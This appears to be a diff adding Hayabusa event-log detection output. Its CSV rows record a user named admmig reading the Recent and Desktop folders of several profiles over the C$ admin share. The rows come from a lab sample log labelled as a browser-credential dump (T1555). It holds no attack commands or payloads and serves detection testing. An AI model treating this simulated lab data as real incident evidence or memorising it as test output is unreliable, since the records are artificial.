+2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
